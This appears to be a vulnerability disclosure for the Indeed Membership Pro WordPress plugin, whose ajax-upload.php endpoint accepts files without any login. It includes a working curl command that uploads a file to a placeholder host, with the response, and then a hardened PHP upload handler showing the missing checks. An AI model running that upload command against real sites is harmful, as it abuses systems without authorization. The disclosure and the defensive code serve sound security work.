The ajax-upload.php endpoint doesn't check for the current user's capabilities (or that they are even logged in), so we can do a few things we shouldn't be able to do.

Without any credentials, you can simply POST the image file in the field ihc_file and it'll store it for you:

~$ curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
{"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"}

Typical WP media upload rules apply, so YMMV on further exploiting this, but if nothing else you probably don't want random media uploaded to your site.
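For contrast, here is what a correctly guarded upload handler looks like. This is an added example written for this page, not the plugin's own code: it routes the upload through WordPress's admin-ajax.php (so the authentication cookies are loaded) and adds the checks the vulnerable endpoint omits. The hook name example_secure_upload, the nonce action example_upload_nonce and the request parameter nonce are hypothetical; the field name ihc_file is taken from the advisory above.

```php
<?php
// Added example, not the plugin's code: a hardened AJAX upload handler that
// performs the checks the vulnerable ajax-upload.php omits. Assumes it is
// loaded by WordPress (a plugin file) and called via wp-admin/admin-ajax.php.
// Hypothetical names: 'example_secure_upload' and 'example_upload_nonce'.

add_action( 'wp_ajax_example_secure_upload', 'example_secure_upload_handler' );
// Deliberately NO 'wp_ajax_nopriv_' hook: anonymous requests never reach the handler.

function example_secure_upload_handler() {
    // 1. Authentication: only logged-in users may continue.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( array( 'message' => 'Authentication required.' ), 401 );
    }

    // 2. Authorization: the user must hold the upload capability.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. CSRF protection: a nonce bound to this action must accompany the request
    //    (check_ajax_referer() exits with -1 / HTTP 403 when it is missing or stale).
    check_ajax_referer( 'example_upload_nonce', 'nonce' );

    // 4. Input validation: the field must exist and be a genuine uploaded file.
    if ( empty( $_FILES['ihc_file'] ) || ! is_uploaded_file( $_FILES['ihc_file']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'No file uploaded.' ), 400 );
    }

    // 5. Type allow-list: images only, verified by content sniffing, not by extension alone.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext(
        $_FILES['ihc_file']['tmp_name'],
        $_FILES['ihc_file']['name'],
        $allowed
    );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( array( 'message' => 'File type not allowed.' ), 415 );
    }

    // 6. Let WordPress move the file with its own name sanitisation and upload-dir rules.
    $result = wp_handle_upload(
        $_FILES['ihc_file'],
        array( 'test_form' => false, 'mimes' => $allowed )
    );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => $result['error'] ), 400 );
    }

    // 7. Register the file as an attachment owned by the uploader, so every
    //    upload is attributable and visible in the media library for review.
    $attachment_id = wp_insert_attachment(
        array(
            'post_mime_type' => $result['type'],
            'post_title'     => sanitize_file_name( basename( $result['file'] ) ),
            'post_status'    => 'inherit',
            'post_author'    => get_current_user_id(),
        ),
        $result['file']
    );

    wp_send_json_success( array( 'id' => $attachment_id, 'url' => $result['url'] ) );
}
```

The ordering matters: authentication and capability checks come before the nonce check, and all three come before the uploaded file is touched, so an unauthenticated request is rejected without any filesystem activity. The absence of a wp_ajax_nopriv_ registration is itself a control, since WordPress only dispatches anonymous admin-ajax requests to handlers registered under that prefix.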
UPLOAD
James Fraser
fwaggle
No
2019-02-26
2019-05-27
2020-02-07